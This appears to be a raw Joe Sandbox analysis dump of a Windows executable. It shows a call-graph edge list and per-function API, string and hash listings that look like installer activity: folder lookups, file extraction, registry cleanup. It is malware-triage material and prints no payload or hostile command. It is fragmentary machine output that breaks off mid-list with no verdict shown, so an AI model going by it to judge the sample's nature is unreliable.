__Getctype 46813->46816 46814->46810 46814->46811 46815 ccabf1 46815->46616 46816->46815 46817 ccabf9 46816->46817 46819 ccaaa0 28 API calls 46816->46819 46818 bba850 HeapAlloc 46817->46818 46820 ccac03 46818->46820 46819->46816 46914 ccac80 26 API calls 46820->46914 46822 ccac45 46915 cb1830 26 API calls std::ios_base::_Ios_base_dtor 46822->46915 46824 ccac51 46916 cb1830 26 API calls std::ios_base::_Ios_base_dtor 46824->46916 46826 ccac5d 46917 cb1830 26 API calls std::ios_base::_Ios_base_dtor 46826->46917 46828 ccac6b 46828->46616 46829->46587 46830->46598 46831->46620 46833 bbab90 12 API calls 46832->46833 46834 cccbc9 46833->46834 46835 ccceee 46834->46835 46839 bbab90 12 API calls 46834->46839 46836 bba850 HeapAlloc 46835->46836 46837 cccef8 46836->46837 46838 bba850 HeapAlloc 46837->46838 46841 cccf02 46838->46841 46840 cccbea 46839->46840 46840->46835 46842 cccbf2 46840->46842 46843 ccc960 4 API calls 46841->46843 46907 cccae0 82 API calls 46842->46907 46844 cccf41 46843->46844 46846 cccf59 PathIsUNCW 46844->46846 46847 cccf45 46844->46847 46849 cccb90 99 API calls 46846->46849 46847->46789 46848 cccc0a 46850 cccd19 46848->46850 46851 cccc15 46848->46851 46852 cccf8e 46849->46852 46853 bd1a90 26 API calls 46850->46853 46854 ccccaa 46851->46854 46868 cccc3b 46851->46868 46855 ccd121 46852->46855 46859 bba380 26 API calls 46852->46859 46856 cccd22 PathIsUNCW 46853->46856 46858 bc4e60 82 API calls 46854->46858 46857 bba850 HeapAlloc 46855->46857 46864 cccd3c 46856->46864 46860 ccd12b CreateFileW 46857->46860 46861 ccccc4 46858->46861 46892 cccfa5 46859->46892 46862 ccd18c GetFileSize 46860->46862 46863 ccd19a 46860->46863 46865 bd1a90 26 API calls 46861->46865 46862->46863 46871 ccd1b4 CloseHandle 46863->46871 46872 ccd1c2 46863->46872 46866 bc4e60 82 API calls 46864->46866 46867 ccccd7 46865->46867 46870 cccd68 46866->46870 46877 bd11b0 94 API calls 46867->46877 46873 bc4e60 82 API calls 46868->46873 46876 bd11b0 94 API calls 46870->46876 46871->46872 46872->46789 46878 cccc55 46873->46878 46874 bba380 26 API calls 46874->46892 46875 ccd0a7 46875->46789 46882 cccd7a 46876->46882 46879 cccca8 46877->46879 46880 bd1a90 26 API calls 46878->46880 46879->46856 46881 cccc68 46880->46881 46883 bd11b0 94 API calls 46881->46883 46884 cccdaf 46882->46884 46885 cccdf8 46882->46885 46883->46879 46908 cae930 38 API calls ___std_exception_destroy 46884->46908 46910 cae930 38 API calls ___std_exception_destroy 46885->46910 46886 bd11b0 94 API calls 46888 ccd014 CreateDirectoryW 46886->46888 46891 ccd028 GetLastError 46888->46891 46888->46892 46890 cccdbb 46909 ccf770 84 API calls 46890->46909 46891->46892 46892->46855 46892->46874 46892->46886 46896 ccaaa0 28 API calls 46892->46896 46897 ccd046 46892->46897 46898 bd11b0 94 API calls 46892->46898 46893 ccce1d 46911 ccf770 84 API calls 46893->46911 46896->46892 46913 cb6ea0 RtlFreeHeap GetLastError ___std_exception_destroy 46897->46913 46898->46892 46899 ccce30 46900 ccaaa0 28 API calls 46899->46900 46902 ccce5d 46900->46902 46901 cccdce 46901->46789 46902->46837 46903 ccce96 46902->46903 46905 ccaaa0 28 API calls 46902->46905 46912 cb6ea0 RtlFreeHeap GetLastError ___std_exception_destroy 46903->46912 46905->46902 46906->46800 46907->46848 46908->46890 46909->46901 46910->46893 46911->46899 46912->46901 46913->46875 46914->46822 46915->46824 46916->46826 46917->46828 46918->46643 46919->46710 46920->46710 46921->46710 46922->46710 46923->46710 46924->46710 46925->46714 46927 d11676 CreateThread 46926->46927 46928 d11648 CreateEventW 46926->46928 46930 d1178c WaitForSingleObject GetExitCodeThread 46927->46930 46937 d116b2 46927->46937 46969 d11950 46927->46969 46929 d1165d 46928->46929 46929->46927 46931 d117c7 46930->46931 46932 d117b9 CloseHandle 46930->46932 46931->46665 46932->46931 46933 d11770 46964 d7fa13 24 API calls 46933->46964 46934 d117dd 46935 bba850 HeapAlloc 46934->46935 46936 d117e7 46935->46936 46939 bbab90 12 API calls 46936->46939 46937->46933 46937->46934 46938 d11789 46938->46930 46940 d11851 46939->46940 46941 d1193b 46940->46941 46942 d1185b 46940->46942 46943 bba850 HeapAlloc 46941->46943 46946 d11879 46942->46946 46947 d11887 46942->46947 46944 d11945 46943->46944 46945 d1195f WaitForSingleObject 46944->46945 46954 d11968 46944->46954 46945->46954 46949 bba140 29 API calls 46946->46949 46947->46947 46966 bba6d0 26 API calls 2 library calls 46947->46966 46950 d11885 46949->46950 46953 cccf10 112 API calls 46950->46953 46951 d119eb 46952 bba850 HeapAlloc 46951->46952 46961 d119f5 std::ios_base::_Ios_base_dtor 46952->46961 46957 d118c0 46953->46957 46954->46951 46955 cf1370 HeapAlloc 46954->46955 46956 d1199c 46954->46956 46962 d119cb 46954->46962 46955->46954 46956->46951 46956->46962 46968 d117f0 125 API calls std::ios_base::_Ios_base_dtor 46956->46968 46967 d67900 14 API calls 46957->46967 46961->46665 46962->46665 46963 d118ed 46963->46665 46964->46938 46965->46689 46966->46950 46967->46963 46968->46956 46970 d1195f WaitForSingleObject 46969->46970 46976 d11968 46969->46976 46970->46976 46971 d119eb 46972 bba850 HeapAlloc 46971->46972 46977 d119f5 std::ios_base::_Ios_base_dtor 46972->46977 46973 cf1370 HeapAlloc 46973->46976 46975 d119cb 46976->46971 46976->46973 46976->46975 46978 d1199c 46976->46978 46978->46971 46978->46975 46979 d117f0 125 API calls std::ios_base::_Ios_base_dtor 46978->46979 46979->46978 46981 d98218 RtlFreeHeap 46980->46981 46983 d9823a __dosmaperr __Wcscoll 46980->46983 46982 d9822d GetLastError 46981->46982 46981->46983 46982->46983 46983->46499 46984 cf5d90 46985 bd1a90 26 API calls 46984->46985 46986 cf5dbf 46985->46986 46987 bd1a90 26 API calls 46986->46987 46988 cf5dcb 46987->46988 46991 cd7070 46988->46991 46990 cf5dd3 46992 bba380 26 API calls 46991->46992 46993 cd70af 46992->46993 46994 cd70d0 GetFileVersionInfoSizeW 46993->46994 47012 bba550 26 API calls 2 library calls 46993->47012 46997 cd70f5 46994->46997 46998 cd70e8 46994->46998 46996 cd70cd 46996->46994 46997->46990 46998->46997 46999 cd711a GetFileVersionInfoW 46998->46999 47013 bba550 26 API calls 2 library calls 46998->47013 46999->46997 47001 cd7131 46999->47001 47003 bbab90 12 API calls 47001->47003 47002 cd7117 47002->46999 47004 cd7136 47003->47004 47005 cd7280 47004->47005 47008 cd7140 47004->47008 47006 bba850 HeapAlloc 47005->47006 47007 cd728a 47006->47007 47010 cd71af 47008->47010 47014 bba550 26 API calls 2 library calls 47008->47014 47010->46997 47015 bba6d0 26 API calls 2 library calls 47010->47015 47012->46996 47013->47002 47014->47010 47015->46997

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00CE1960 Relevance: 37.4, APIs: 11, Strings: 10, Instructions: 622libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C,?,?,?), ref: 00CE1B65
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00CE1C60
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D,?,?,?), ref: 00CE1D60
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00CE1E45
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00CE1F8C
                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D,?,?,?), ref: 00CE2072
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CE20E6
                                                                                                                                                                        • LoadLibraryW.KERNEL32(shfolder.dll,?,?,?), ref: 00CE20FC
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00CE212E
                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00CE219C
                                                                                                                                                                        • SHGetMalloc.SHELL32(00000000), ref: 00CE21B5
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Directory$FolderPathWindows$AddressAllocFileFromHeapInit_thread_footerLibraryListLoadLocationMallocModuleNameProcSpecialSystem
                                                                                                                                                                        • String ID: ProgramFiles64Folder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
                                                                                                                                                                        • API String ID: 1264188777-2142986682
                                                                                                                                                                        • Opcode ID: 991b977495fb7f2cd7ab78372da4a388889d5f793ae149918da1473e6d5abf94
                                                                                                                                                                        • Instruction ID: da6587148855af61869b2a7ce651c77ed076feecc15fec01ec8b758fd0af39c4
                                                                                                                                                                        • Opcode Fuzzy Hash: 991b977495fb7f2cd7ab78372da4a388889d5f793ae149918da1473e6d5abf94
                                                                                                                                                                        • Instruction Fuzzy Hash: AF320570A002858FDB24DF29CC45BBDB3B5EF54310F1842D9E916A7291EB71AF85DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CE67F0 Relevance: 27.5, APIs: 11, Strings: 4, Instructions: 1264synchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00CE6874
                                                                                                                                                                        • __Xtime_get_ticks.LIBCPMT ref: 00CE687C
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CE68C6
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CE6AB1
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,1FC3D414), ref: 00CE6CA8
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00CE6CAF
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00CE6CDE
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00CE6CF3
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                          • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
                                                                                                                                                                          • Part of subcall function 00CD1DA0: __Init_thread_footer.LIBCMT ref: 00CD1E16
                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CE74B5
                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00CE74F0
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00CE7523
                                                                                                                                                                          • Part of subcall function 00CEA490: GetCurrentProcess.KERNEL32(?,1FC3D414), ref: 00CEA4F9
                                                                                                                                                                          • Part of subcall function 00CEA490: IsWow64Process.KERNEL32(00000000), ref: 00CEA500
                                                                                                                                                                          • Part of subcall function 00CEA490: _wcsrchr.LIBVCRUNTIME ref: 00CEA581
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$Init_thread_footer$CreateCurrentHeapToken$AllocCloseCountEventFindHandleInformationObjectOpenResourceSingleThreadTickUnothrow_t@std@@@WaitWow64Xtime_get_ticks__ehfuncinfo$??2@_wcsrchr
                                                                                                                                                                        • String ID: /uninstall$VersionString$\/:*?"<>|$\\?\
                                                                                                                                                                        • API String ID: 1945640678-654522458
                                                                                                                                                                        • Opcode ID: 39f8349507b80d0d7b33220da1b35342aab2aa8b18699cca32b69d8060668622
                                                                                                                                                                        • Instruction ID: 3a65612a0adfd269b6e947359e142cb9cb1b4b4c43af8ba166bd1ee49dfe4b21
                                                                                                                                                                        • Opcode Fuzzy Hash: 39f8349507b80d0d7b33220da1b35342aab2aa8b18699cca32b69d8060668622
                                                                                                                                                                        • Instruction Fuzzy Hash: D8B2DE70E00649DFDB14DFA9C845BAEBBF4FF04314F148269E825AB291DB74AE45CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CF3E10 Relevance: 27.0, APIs: 10, Strings: 5, Instructions: 768fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1062 cf3e10-cf3e64 1063 cf424d-cf4253 1062->1063 1064 cf3e6a-cf3e76 1062->1064 1066 cf4258 1063->1066 1065 cf3e80-cf3e99 call d103a0 1064->1065 1072 cf3e9f-cf3ea1 1065->1072 1073 cf3f98-cf3f9a 1065->1073 1067 cf425a-cf427c call d7fe6a 1066->1067 1074 cf4289-cf428e call bba850 1072->1074 1076 cf3ea7-cf3eaa 1072->1076 1073->1074 1075 cf3fa0-cf3fa3 1073->1075 1081 cf4293-cf42dc call bba850 1074->1081 1075->1074 1077 cf3fa9-cf3fb0 1075->1077 1076->1074 1079 cf3eb0-cf3eb7 1076->1079 1077->1074 1080 cf3fb6-cf3fbc 1077->1080 1079->1074 1082 cf3ebd-cf3ec0 1079->1082 1080->1074 1083 cf3fc2-cf3fe2 call ccbfa0 1080->1083 1095 cf42de-cf42e3 call bba550 1081->1095 1096 cf42e8-cf42f6 call cfe1f0 1081->1096 1082->1074 1085 cf3ec6-cf3f00 call bba380 call bbab90 1082->1085 1093 cf4008-cf4061 call cc1d50 call d821f0 FindFirstFileW 1083->1093 1094 cf3fe4-cf3fe9 1083->1094 1103 cf427f-cf4284 call bba850 1085->1103 1104 cf3f06-cf3f1b 1085->1104 1119 cf4063-cf406a FindClose 1093->1119 1120 cf4071-cf4078 call bbab90 1093->1120 1094->1081 1098 cf3fef-cf3ff1 1094->1098 1095->1096 1108 cf42fc-cf4307 1096->1108 1109 cf43e2-cf43e4 1096->1109 1098->1081 1105 cf3ff7-cf3ffc 1098->1105 1103->1074 1124 cf3f2d 1104->1124 1125 cf3f1d-cf3f2b 1104->1125 1105->1093 1111 cf3ffe-cf4003 call bd1bb0 1105->1111 1113 cf4309-cf4321 call cccae0 1108->1113 1114 cf4337-cf433e 1108->1114 1117 cf4408-cf4411 1109->1117 1118 cf43e6 1109->1118 1111->1093 1138 cf4326-cf4331 1113->1138 1139 cf4323 1113->1139 1126 cf43c9-cf43df 1114->1126 1127 cf4344-cf434b call bbab90 1114->1127 1122 cf4417-cf441e call bbab90 1117->1122 1123 cf4524-cf4537 1117->1123 1128 cf43ec-cf43f9 call cccf10 1118->1128 1129 cf43e8-cf43ea 1118->1129 1119->1120 1120->1103 1143 cf407e-cf40c9 call d104e0 1120->1143 1144 cf453a-cf455e call bba850 1122->1144 1145 cf4424-cf4491 call bb9bb0 CreateFileW call ccaaa0 1122->1145 1134 cf3f2f-cf3f67 call d104e0 1124->1134 1125->1134 1127->1144 1147 cf4351-cf4378 call bd11b0 1127->1147 1136 cf43fe-cf4406 1128->1136 1129->1117 1129->1128 1150 cf3f69-cf3f6c 1134->1150 1151 cf3f71-cf3f73 1134->1151 1136->1122 1138->1109 1138->1114 1139->1138 1181 cf40cb-cf40ce 1143->1181 1182 cf40d3-cf40d5 1143->1182 1174 cf4586-cf458f 1144->1174 1175 cf4560-cf4568 1144->1175 1203 cf44af-cf44ba 1145->1203 1204 cf4493 1145->1204 1176 cf437a-cf437f 1147->1176 1177 cf4399-cf43bf call cff8f0 1147->1177 1150->1151 1155 cf3f79-cf3f8a 1151->1155 1156 cf41b1-cf41c3 1151->1156 1158 cf4119-cf4135 1155->1158 1159 cf3f90-cf3f93 1155->1159 1161 cf4208-cf4233 call d105c0 1156->1161 1162 cf41c5-cf41c8 1156->1162 1169 cf4137-cf413d 1158->1169 1170 cf4153-cf4189 call d105c0 1158->1170 1166 cf4114 1159->1166 1191 cf4246-cf424b 1161->1191 1192 cf4235-cf423c CloseHandle 1161->1192 1168 cf4203 1162->1168 1166->1158 1168->1161 1178 cf4140-cf4144 1169->1178 1201 cf419c-cf41a3 1170->1201 1202 cf418b-cf4192 CloseHandle 1170->1202 1185 cf4595-cf45de call bba850 1174->1185 1175->1174 1175->1185 1186 cf4380-cf4389 1176->1186 1177->1126 1212 cf43c1-cf43c4 1177->1212 1188 cf414b-cf4151 1178->1188 1189 cf4146-cf4148 1178->1189 1181->1182 1194 cf40db-cf40f0 1182->1194 1195 cf41ca-cf41df 1182->1195 1219 cf4686-cf4691 1185->1219 1220 cf45e4-cf45e8 1185->1220 1186->1186 1199 cf438b-cf4394 call bd11b0 1186->1199 1188->1170 1188->1178 1189->1188 1191->1067 1192->1191 1205 cf40fa-cf410f 1194->1205 1206 cf40f2-cf40f5 1194->1206 1197 cf41e9-cf41fe 1195->1197 1198 cf41e1-cf41e4 1195->1198 1197->1161 1211 cf4200-cf4202 1197->1211 1198->1197 1199->1177 1215 cf41a9-cf41ac 1201->1215 1216 cf4255 1201->1216 1202->1201 1207 cf44bd-cf44e4 SetFilePointer SetEndOfFile 1203->1207 1213 cf449d-cf44ad 1204->1213 1214 cf4495-cf449b 1204->1214 1205->1158 1208 cf4111-cf4113 1205->1208 1206->1205 1217 cf44e6-cf44ed FindCloseChangeNotification 1207->1217 1218 cf44f4-cf4509 1207->1218 1208->1166 1211->1168 1212->1126 1213->1207 1214->1203 1214->1213 1215->1065 1216->1066 1217->1218 1221 cf450b-cf450e 1218->1221 1222 cf4513-cf451e 1218->1222 1224 cf4693-cf469c call d89d16 1219->1224 1225 cf46a2-cf46c1 1219->1225 1220->1219 1226 cf46c2-cf46fb call bba850 1220->1226 1221->1222 1222->1122 1222->1123 1224->1225 1231 cf46fd-cf4723 1226->1231 1232 cf4755-cf4766 1226->1232 1234 cf4737-cf474e call d7fe78 1231->1234 1235 cf4725-cf4733 1231->1235 1234->1232 1235->1234 1236 cf4767-cf476c call d852ff 1235->1236
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,1FC3D414,?,00000000,00000000), ref: 00CF4032
                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CF4064
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00CF418C
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00CF4236
                                                                                                                                                                        • CreateFileW.KERNEL32(1FC3D414,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,8000000B,1FC3D414), ref: 00CF4466
                                                                                                                                                                        • SetFilePointer.KERNEL32(8000000B,7FFFFFFF,00000000,00000000,1FC3D414), ref: 00CF44C5
                                                                                                                                                                        • SetEndOfFile.KERNEL32(8000000B), ref: 00CF44CE
                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(8000000B), ref: 00CF44E7
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,00000000,?,?,?,80004005,?,?,8000000B,1FC3D414,?,00000000,00000000), ref: 00CF457B
                                                                                                                                                                        • CloseHandle.KERNEL32(?,1FC3D414,00000000,?,?,00000000,?,?,?), ref: 00CF465B
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFile$FindHandle$HeapInit_thread_footer$AllocChangeCreateDeleteFirstNotificationPointerProcess
                                                                                                                                                                        • String ID: %sholder%d.aiph$<3$<3$<3$Not enough disk space to extract file:
                                                                                                                                                                        • API String ID: 707736400-357627853
                                                                                                                                                                        • Opcode ID: d7e9b277e4d50881c32ad20d07529a13a17a07ed3057ec5ae80632a8e7bba5b5
                                                                                                                                                                        • Instruction ID: b33c3955c538a59bc9872d96814d7db6f279a144878dd39ba5b244a915d43da8
                                                                                                                                                                        • Opcode Fuzzy Hash: d7e9b277e4d50881c32ad20d07529a13a17a07ed3057ec5ae80632a8e7bba5b5
                                                                                                                                                                        • Instruction Fuzzy Hash: 3952F771900609DFDB14DF68CC84BAEBBF4FF45314F148269EA25AB391DB70AA44CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D0AC30 Relevance: 26.8, APIs: 12, Strings: 3, Instructions: 529registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1241 d0ac30-d0acc9 GetUserNameW 1242 d0ad15-d0ad53 GetEnvironmentVariableW 1241->1242 1243 d0accb-d0acd4 GetLastError 1241->1243 1245 d0ad55-d0ad5a 1242->1245 1246 d0ad99-d0adcc 1242->1246 1243->1242 1244 d0acd6-d0acde 1243->1244 1249 d0ace0-d0acf4 1244->1249 1250 d0acf6-d0acfe call bbee10 1244->1250 1251 d0ad72-d0ad7c call bbee10 1245->1251 1252 d0ad5c-d0ad70 1245->1252 1247 d0ade3-d0adeb call bb8190 1246->1247 1248 d0adce-d0ade1 1246->1248 1253 d0adf0-d0ae25 call bb8060 * 2 1247->1253 1248->1253 1255 d0ad03-d0ad13 GetUserNameW 1249->1255 1250->1255 1257 d0ad81-d0ad93 GetEnvironmentVariableW 1251->1257 1252->1257 1263 d0ae27-d0ae39 1253->1263 1264 d0ae59-d0ae76 1253->1264 1255->1242 1257->1246 1265 d0ae3b-d0ae49 1263->1265 1266 d0ae4f-d0ae56 call d7fe78 1263->1266 1267 d0aea6-d0aed9 call d7fe6a 1264->1267 1268 d0ae78-d0ae8a 1264->1268 1265->1266 1270 d0aeda-d0af61 call d852ff call d0b380 call cca1c0 call bb8810 1265->1270 1266->1264 1272 d0ae9c-d0aea3 call d7fe78 1268->1272 1273 d0ae8c-d0ae9a 1268->1273 1286 d0af63-d0af84 call cb8330 1270->1286 1287 d0af8c-d0af92 1270->1287 1272->1267 1273->1270 1273->1272 1291 d0af89 1286->1291 1289 d0af94 1287->1289 1290 d0af96-d0afc5 RegDeleteValueW call bb8810 * 2 1287->1290 1289->1290 1296 d0afd5-d0b048 call bb8190 call cca1c0 1290->1296 1297 d0afc7-d0afce RegCloseKey 1290->1297 1291->1287 1302 d0b04a-d0b05c 1296->1302 1303 d0b07c-d0b093 1296->1303 1297->1296 1304 d0b072-d0b079 call d7fe78 1302->1304 1305 d0b05e-d0b06c 1302->1305 1306 d0b095-d0b0b6 call cb8330 1303->1306 1307 d0b0bb-d0b120 call d0b530 call cca1c0 RegQueryInfoKeyW 1303->1307 1304->1303 1305->1304 1308 d0b372 call d852ff 1305->1308 1306->1307 1320 d0b122-d0b14c call bb8810 * 2 1307->1320 1321 d0b16c-d0b196 call bb8810 * 2 1307->1321 1315 d0b377-d0b37f call d852ff 1308->1315 1330 d0b160-d0b16a 1320->1330 1331 d0b14e-d0b156 1320->1331 1332 d0b198-d0b1a0 1321->1332 1333 d0b1aa-d0b1b8 1321->1333 1334 d0b1c6-d0b1ff call bb8810 * 3 1330->1334 1331->1330 1332->1333 1335 d0b1ba 1333->1335 1336 d0b1bc-d0b1c0 RegDeleteKeyW 1333->1336 1345 d0b201-d0b204 RegCloseKey 1334->1345 1346 d0b20b-d0b25f call bb8190 call cca1c0 1334->1346 1335->1336 1336->1334 1345->1346 1351 d0b261-d0b273 1346->1351 1352 d0b293-d0b2af 1346->1352 1355 d0b275-d0b283 1351->1355 1356 d0b289-d0b290 call d7fe78 1351->1356 1353 d0b2b1-d0b2e6 call cb8330 1352->1353 1354 d0b2ec-d0b2f0 1352->1354 1353->1354 1359 d0b2f2 1354->1359 1360 d0b2f4-d0b312 RegDeleteValueW call bb8810 1354->1360 1355->1315 1355->1356 1356->1352 1359->1360 1364 d0b317-d0b335 call bb8810 1360->1364 1367 d0b344-d0b371 call d7fe6a 1364->1367 1368 d0b337-d0b33a RegCloseKey 1364->1368 1368->1367
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00D0ACC5
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00D0ACCB
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00D0AD13
                                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 00D0AD49
                                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 00D0AD93
                                                                                                                                                                        • RegDeleteValueW.KERNEL32(?,?,00000000,80000001,00000001,00000000,1FC3D414), ref: 00D0AF98
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,1FC3D414), ref: 00D0AFC8
                                                                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,1FC3D414,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D0B10D
